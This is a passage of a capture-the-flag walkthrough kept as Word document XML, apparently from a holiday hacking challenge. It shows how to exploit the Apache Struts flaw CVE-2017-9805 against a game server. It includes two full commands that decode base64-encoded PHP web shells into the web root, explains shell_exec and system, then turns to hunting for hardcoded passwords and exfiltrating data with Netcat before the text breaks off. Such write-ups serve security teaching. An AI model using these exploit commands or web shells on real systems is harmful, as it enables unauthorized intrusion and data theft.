    <w:p w14:paraId="4C5B9E7F" w14:textId="47D57CB5" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The most effective method I’ve found to avoid the problem with quotes is to encode the command, with all of its quotes, using base64 in a method similar to that shown </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00E81189">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.  Also, we can greatly increase our chances of success by testing our shell on a local VM before we try to deploy it to the l2s/dev server.  Although the l2s server runs Nginx with PHP support, I found that testing the shell on a simple Apache server (with PHP support) worked well.  On a CentOS VM, installing Apache and PHP requires just two commands (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E81189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo yum install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E81189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>httpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo yum install php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.)  On Ubuntu, the commands to install the basics are </w:t>
      </w:r>
      <w:r w:rsidR="00AF5D4A" w:rsidRPr="00AF5D4A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="00AF5D4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>apt-get install apache2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="00AF5D4A" w:rsidRPr="00AF5D4A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="00AF5D4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>apt-get install php libapache2-mod-php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384679F7" w14:textId="71CA9F7D" w:rsidR="00B11CB6" w:rsidRDefault="00B11CB6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Note:  I needed to configure a local Apache/PHP server so that I could troubleshoot problems with the code I was sending to the server, mostly typos.  Since the exploit code does not return errors, I could not tell why my PHP shell was failing and had to troubleshoot on a local server.  If you want to skip testing your code on a local Apache/PHP server, that’s fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC455A" w14:textId="1B5F7634" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>The following procedure works well to get a working web shell on the l2s server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D7805" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Put the shell code (Sparkle’s Hint 4 or 5) into a PHP file on the test Apache/PHP VM.  Get it working and learn how to use it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED22810" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pipe the working PHP file through base64 to encode it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57DC42" w14:textId="70B7D3A5" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Put the base64 text into the cve-2017-9805.py command and upload, decode it and redirect it to a file on the dev server.  When we save the PHP file, we need to give it a complex or random file name so that other people cannot use our shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A99FC7" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enjoy the web shell on the l2s server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6359EE" w14:textId="6B60A87E" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t xml:space="preserve">Here is the code on the test Apache/PHP VM.  PHP code uses echo to send output to the browser.  The &lt;pre&gt; and &lt;/pre&gt; tags tell the browser to display the output in a fixed-width font like Courier and preserve white space.  Otherwise the browser will ignore things like spaces and line returns, which will make the output hard to read.  The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72CFB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>$_GET[</w:t>
      </w:r>
      <w:r w:rsidR="002A118D" w:rsidRPr="002A118D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72CFB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="002A118D" w:rsidRPr="002A118D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72CFB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code tells the server that we will send our commands to it using the HTTP GET method, where the command is put in the URL.  The server will look for the content in a variable named “e”, so we will need to affix our command to the end of the URL with “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>?e=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ourcommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”.  (You can see that in the end of Sparkle’s Hint 4.)  Finally, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command tells the server to send our command to a shell (SH or BASH, probably.)  This file is named </w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:t>99YtTciHkq.php</w:t>
      </w:r>
      <w:r w:rsidR="002A118D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>, but any long or random name will do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779D983" w14:textId="3874B1F3" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46707F3D" wp14:editId="64CE1B61">
            <wp:extent cx="3608739"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6649" cy="851651"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A4DE1" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Here is a successful test of our code on the Apache/PHP VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AAA208" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51FD385F" wp14:editId="7A687012">
            <wp:extent cx="3829050" cy="14165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1535"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3845112" cy="1422519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716D8F5" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Now that we have fixed the inevitable typos and errors, we know that we have a working PHP file for our shell.  The next step (2, above) is to base64 encode the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E16DB" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A06165" wp14:editId="0AC5271A">
            <wp:extent cx="59436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2857"/>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400F9FF5" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Next (step 3, above), we need to upload the file to the dev server using the Apache Struts vulnerability.  We use the echo command to pipe our base64 text into the base64 decoder and redirect that to a file on the l2s web root.  The single quotes after the echo command are important.  We don’t want base64 symbols like /, +, or =, to be interpreted by the Python script.  We use double quotes around the entire command (after the -c) so that they don’t interfere with the single quotes inside the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32785006" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4879C7E4" wp14:editId="02F65F8E">
            <wp:extent cx="594360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3050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2BDBC" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRPr="00745F4B" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00745F4B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00745F4B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cve-2017-9805.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "echo 'IDw/cGhwIGVjaG8gIjxwcmU+IiAuIHNoZWxsX2V4ZWMoJF9HRVRbImUiXSkgLiAiPC9wcmU+IjsgPz4gCg==' | base64 -d &gt; /var/www/html/99YtTciHkq.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A55C10C" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Finally (step 4), we test the shell.  Remember that the shell will be visible on l2s, not dev.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DBA47A" w14:textId="447DE170" w:rsidR="00FB16B6" w:rsidRDefault="002A118D" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00550A75" wp14:editId="1337B238">
            <wp:extent cx="4121405"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7374" cy="1380242"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341C23A" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>SUCCESS!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4DFBE" w14:textId="51052F74" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t xml:space="preserve">Just for fun, here is the simple PHP shell that Sparkle mentions in Hint 5.  To save space, I’ll omit the testing on the Apache/PHP VM.  I did need to test, as I made mistakes when I tried to deploy it without testing.  The only real difference </w:t>
      </w:r>
      <w:r w:rsidR="002A118D">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this PHP code is that it gives you a nice box to put the command into, and a handy “Execute” button to press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C87077" w14:textId="51981771" w:rsidR="00FB16B6" w:rsidRDefault="002A118D" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Here is</w:t>
      </w:r>
      <w:r w:rsidR="00FB16B6">
        <w:t xml:space="preserve"> the content of the PHP file--it was copied from the web site and pasted into the vi editor.</w:t>
      </w:r>
      <w:r w:rsidR="002B14CF">
        <w:t xml:space="preserve">  The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B14CF">
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B14CF">
        <w:t xml:space="preserve"> editor works just as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F430C" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5DE3EE" wp14:editId="78FDF8D3">
            <wp:extent cx="5943600" cy="2600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301"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2600325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BF795" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Here is the file being encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3425C8E6" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="423FAEEA" wp14:editId="20260F04">
            <wp:extent cx="5943600"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847"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1009650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2898FB1E" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>This uploads the command to the l2s/dev server.  Note that the text of the command is all one line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE68664" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F1AD548" wp14:editId="73751A46">
            <wp:extent cx="5076825" cy="191845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2713" cy="1939573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE71AA" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6"/>
    <w:p w14:paraId="3A1B373D" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72CFB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>./cve-2017-9805.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "echo 'PGh0bWw+Cjxib2R5Pgo8Zm9ybSBtZXRob2Q9IkdFVCIgbmFtZT0iPD9waHAgZWNobyBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+Ij4KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPgo8aW5wdXQgdHlwZT0iU1VCTUlUIiB2YWx1ZT0iRXhlY3V0ZSI+CjwvZm9ybT4KPHByZT4KPD9waHAKICAgIGlmKCRfR0VUWydjbWQnXSkKICAgIHsKICAgICAgICBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKICAgIH0KPz4KPC9wcmU+CjwvYm9keT4KPHNjcmlwdD5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY21kIikuZm9jdXMoKTs8L3NjcmlwdD4KPC9odG1sPgo=' | base64 -d &gt; /var/www/html/SXpgvDSs80.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122E6A4" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRPr="00D72CFB" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>Finally, successful execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7065B" w14:textId="6D9280AC" w:rsidR="00FB16B6" w:rsidRDefault="00314D37" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285F317C" wp14:editId="45BFBEF6">
            <wp:extent cx="5943600" cy="2630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30805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA16ADF" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRPr="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6"/>
    <w:p w14:paraId="64EBDDBA" w14:textId="25594860" w:rsidR="00953A15" w:rsidRDefault="00D32645" w:rsidP="00E04EB3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Look for</w:t>
      </w:r>
      <w:r w:rsidR="00214D9D">
        <w:t xml:space="preserve"> the Great Book Page</w:t>
      </w:r>
      <w:r w:rsidR="00426272">
        <w:t xml:space="preserve"> and Alabaster’s Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE96C0A" w14:textId="160C23BA" w:rsidR="00E04EB3" w:rsidRDefault="00E04EB3" w:rsidP="00E04EB3">
      <w:r>
        <w:t xml:space="preserve">First use your shell to </w:t>
      </w:r>
      <w:r w:rsidR="00426272">
        <w:t>look around, keeping in mind the things we are looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C878EC1" w14:textId="6F605518" w:rsidR="00426272" w:rsidRDefault="00426272" w:rsidP="00E04EB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53282B65" wp14:editId="72418A15">
            <wp:extent cx="5943600" cy="321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1945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DCC85" w14:textId="50E7F530" w:rsidR="00426272" w:rsidRDefault="00426272" w:rsidP="00E04EB3">
      <w:r>
        <w:t>Take careful note of Sparkle Redberry’s Hint 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187928F3" w14:textId="2642FB3B" w:rsidR="00426272" w:rsidRDefault="00426272" w:rsidP="00426272">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72ACC200" wp14:editId="1E765B58">
            <wp:extent cx="2630282"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3651" cy="1662465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF8BA5F" w14:textId="7CAB69D5" w:rsidR="00E04EB3" w:rsidRDefault="00D32645" w:rsidP="00E04EB3">
      <w:r>
        <w:t xml:space="preserve">I first saw prohibitions against putting passwords in code nearly 20 years ago, but developers still do it to this day.  </w:t>
      </w:r>
      <w:r w:rsidR="006B63AF">
        <w:t xml:space="preserve">Most likely you will find Alabaster’s password in a </w:t>
      </w:r>
      <w:r w:rsidR="00DF7A35">
        <w:t>file of code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5708033E" w14:textId="0DACE3A9" w:rsidR="00B563F1" w:rsidRDefault="00B563F1" w:rsidP="00E04EB3">
      <w:r>
        <w:t xml:space="preserve">Find the location (file path) and file name of the Great Book page.  You may not find Alabaster’s password in a quick look around, but you should be able to determine likely locations for code.  </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6A3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:  The process command, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F6A3F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F6A3F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux</w:t>
      </w:r>
      <w:r>
        <w:t>, may help you determine code locations as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA682F7" w14:textId="6BB77197" w:rsidR="00B563F1" w:rsidRDefault="00B563F1" w:rsidP="00B563F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Grab the Great Book Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778DADC1" w14:textId="68425357" w:rsidR="00B563F1" w:rsidRDefault="00B563F1" w:rsidP="00B563F1">
      <w:r>
        <w:t>Once you know the path and name of the Page, you should be able to get a copy of it.  In security jargon, this is called exfiltrating data.  As usual there are many methods, and we’ll only cover a few.</w:t>
      </w:r>
      <w:r w:rsidR="00037C4B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00E24E16">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00037C4B">
        <w:t>If you are alert, you won’t have to use Netcat to get the Great Book Page.</w:t>
      </w:r>
      <w:r w:rsidR="00E24E16">
        <w:t xml:space="preserve">  I wasn’t alert, so I did it the hard way; the easy way is shown in a later lesson.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2727C62C" w14:textId="62714145" w:rsidR="00B563F1" w:rsidRDefault="00B563F1" w:rsidP="00B563F1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D35F60D" w14:textId="5CFC685A" w:rsidR="003C5B36" w:rsidRDefault="002F6A3F" w:rsidP="003C5B36">
      <w:r>
        <w:t>You are probably already running Netcat in</w:t>
      </w:r>
      <w:r w:rsidR="003C5B36">
